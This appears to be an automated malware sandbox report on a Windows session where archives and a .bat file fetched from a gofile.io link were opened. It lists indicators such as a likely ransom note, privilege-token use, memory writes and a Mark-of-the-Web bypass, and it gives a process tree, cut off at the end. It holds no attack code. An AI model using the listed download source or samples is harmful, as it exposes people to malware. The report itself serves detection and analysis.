File created	C:\Users\Admin\AppData\Local\Temp\Rar$DRb1060.18401.rartemp\a974ec99d2e7ac298007b066163c97032a9a2e1e9b8531ba327c9e65734cf474.bat:Zone.Identifier	WinRAR.exe
File opened for modification	C:\Users\Admin\Downloads\systeminformer-3.2.25011-release-setup.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\sslipblacklist.tar.gz:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1.zip:Zone.Identifier	chrome.exe
File created	C:\Users\Admin\AppData\Local\Temp\Rar$DRb4680.15047.rartemp\113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1.exe:Zone.Identifier	WinRAR.exe
File opened for modification	C:\Users\Admin\Downloads\1736950955__«FîleReady▬PassWord▬Is☼◄151422►» (1).zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\a974ec99d2e7ac298007b066163c97032a9a2e1e9b8531ba327c9e65734cf474.zip:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\1736950955__«FîleReady▬PassWord▬Is☼◄151422►».zip:Zone.Identifier	chrome.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3148	NOTEPAD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1772	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2384	chrome.exe
2384	chrome.exe
2744	Ninite.exe
2744	Ninite.exe
2396	chrome.exe
2396	chrome.exe
2396	chrome.exe
2396	chrome.exe
1372	msedge.exe
1372	msedge.exe
2600	msedge.exe
2600	msedge.exe
2316	powershell.exe
2316	powershell.exe
2316	powershell.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe
1996	SystemInformer.exe

Suspicious behavior: GetForegroundWindowSpam 12 IoCs

pid	Process
1060	WinRAR.exe
4712	WinRAR.exe
4156	OpenWith.exe
4680	WinRAR.exe
4000	WinRAR.exe
3320	WinRAR.exe
1416	WinRAR.exe
1500	WinRAR.exe
2096	WinRAR.exe
4716	WinRAR.exe
1772	explorer.exe
3672	WinRAR.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2600	msedge.exe
2600	msedge.exe
2600	msedge.exe
2600	msedge.exe
2600	msedge.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeShutdownPrivilege	2384	chrome.exe
Token: SeCreatePagefilePrivilege	2384	chrome.exe
Token: SeTcbPrivilege	2744	Ninite.exe
Token: SeCreateTokenPrivilege	2744	Ninite.exe
Token: SeAssignPrimaryTokenPrivilege	2744	Ninite.exe
Token: SeLoadDriverPrivilege	2744	Ninite.exe
Token: SeBackupPrivilege	2744	Ninite.exe
Token: SeRestorePrivilege	2744	Ninite.exe
Token: SeDebugPrivilege	2744	Ninite.exe
Token: SeTakeOwnershipPrivilege	2744	Ninite.exe
Token: SeLockMemoryPrivilege	2744	Ninite.exe
Token: SeIncreaseQuotaPrivilege	2744	Ninite.exe
Token: SeMachineAccountPrivilege	2744	Ninite.exe
Token: SeTcbPrivilege	2744	Ninite.exe
Token: SeSecurityPrivilege	2744	Ninite.exe
Token: SeSystemProfilePrivilege	2744	Ninite.exe
Token: SeSystemtimePrivilege	2744	Ninite.exe
Token: SeProfSingleProcessPrivilege	2744	Ninite.exe
Token: SeIncBasePriorityPrivilege	2744	Ninite.exe
Token: SeCreatePagefilePrivilege	2744	Ninite.exe
Token: SeCreatePermanentPrivilege	2744	Ninite.exe
Token: SeShutdownPrivilege	2744	Ninite.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
1060	WinRAR.exe
1060	WinRAR.exe
1060	WinRAR.exe
1060	WinRAR.exe
1060	WinRAR.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2600	msedge.exe
2600	msedge.exe
2600	msedge.exe
2600	msedge.exe
2600	msedge.exe
2600	msedge.exe
2600	msedge.exe
2600	msedge.exe
2600	msedge.exe
2600	msedge.exe
2600	msedge.exe
2600	msedge.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
2384	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
756	chrome.exe
1772	explorer.exe
1772	explorer.exe
1772	explorer.exe
1772	explorer.exe
1772	explorer.exe
1772	explorer.exe
756	chrome.exe
756	chrome.exe

Suspicious use of SetWindowsHookEx 30 IoCs

pid	Process
3068	uninstall.exe
1580	RarExtInstaller.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4156	OpenWith.exe
4088	helppane.exe
4088	helppane.exe
3420	DisplayPhotoViewer.exe
3420	DisplayPhotoViewer.exe
1772	explorer.exe
1772	explorer.exe
1392	DisplayPhotoViewer.exe
1392	DisplayPhotoViewer.exe
1772	explorer.exe
1772	explorer.exe
4692	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2384 wrote to memory of 880	2384	chrome.exe	77
PID 2384 wrote to memory of 880	2384	chrome.exe	77
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5104	2384	chrome.exe	78
PID 2384 wrote to memory of 5116	2384	chrome.exe	79
PID 2384 wrote to memory of 5116	2384	chrome.exe	79
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80
PID 2384 wrote to memory of 1272	2384	chrome.exe	80

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/YHZWCx
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb4ed2cc40,0x7ffb4ed2cc4c,0x7ffb4ed2cc58
  2⤵
  PID:880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1944 /prefetch:2
  2⤵
  PID:5104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1708,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1976 /prefetch:3
  2⤵
  PID:5116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2116,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2124 /prefetch:8
  2⤵
  PID:1272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3116 /prefetch:1
  2⤵
  PID:4224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3084,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:1
  2⤵
  PID:2076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3552,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4428 /prefetch:1
  2⤵
  PID:2360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4252,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:3908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4660,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4264 /prefetch:1
  2⤵
  PID:4868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3268,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:1
  2⤵
  PID:2920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3236,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:8
  2⤵
  PID:2844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4500,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4428 /prefetch:1
  2⤵
  PID:4668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4688,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4684 /prefetch:1
  2⤵
  PID:1716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3328,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:5040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3488,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5432 /prefetch:8
  2⤵
  PID:4652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5416,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5456 /prefetch:8
  2⤵
  PID:3980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5288,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5560 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:812
- C:\Users\Admin\Downloads\Ninite WinRAR Installer.exe
  "C:\Users\Admin\Downloads\Ninite WinRAR Installer.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  PID:1392
- - C:\Users\Admin\AppData\Local\Temp\e2ed869a-d34b-11ef-8913-dabf5c250993\Ninite.exe
    Ninite.exe "40ec348a19ec03fa4718234aefa6bad722e36309" /fullpath "C:\Users\Admin\Downloads\Ninite WinRAR Installer.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2744
  - - C:\Users\Admin\AppData\Local\Temp\E43BB5~1\target.exe
      "C:\Users\Admin\AppData\Local\Temp\E43BB5~1\target.exe" /S
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      PID:1264
    - - C:\Program Files\WinRAR\uninstall.exe
        
        "C:\Program Files\WinRAR\uninstall.exe" /setup
        5⤵
        Executes dropped EXE
        Modifies system executable filetype association
        Drops file in Program Files directory
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:3068
      - C:\Program Files\WinRAR\RarExtInstaller.exe
        
        "C:\Program Files\WinRAR\RarExtInstaller.exe" -install
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=6392,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6428 /prefetch:1
  2⤵
  PID:712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=3116,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6408 /prefetch:1
  2⤵
  PID:1064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6556,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6580 /prefetch:1
  2⤵
  PID:2396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4720,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5420 /prefetch:8
  2⤵
  - NTFS ADS
  PID:3420
- C:\Program Files\WinRAR\WinRAR.exe
  "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\a974ec99d2e7ac298007b066163c97032a9a2e1e9b8531ba327c9e65734cf474.zip"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - NTFS ADS
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  PID:1060
- - C:\Program Files\WinRAR\RarExtInstaller.exe
    "C:\Program Files\WinRAR\RarExtInstaller.exe" -install
    3⤵
    - Executes dropped EXE
    PID:392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6396,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6100 /prefetch:1
  2⤵
  PID:4692
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=6188,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4704 /prefetch:1
  2⤵
  PID:5052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=4496,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3560 /prefetch:1
  2⤵
  PID:2744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=4556,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6168 /prefetch:1
  2⤵
  PID:1448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=4656,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4316 /prefetch:1
  2⤵
  PID:3964
- C:\Program Files\Google\Chrome\Application\chrome.exe
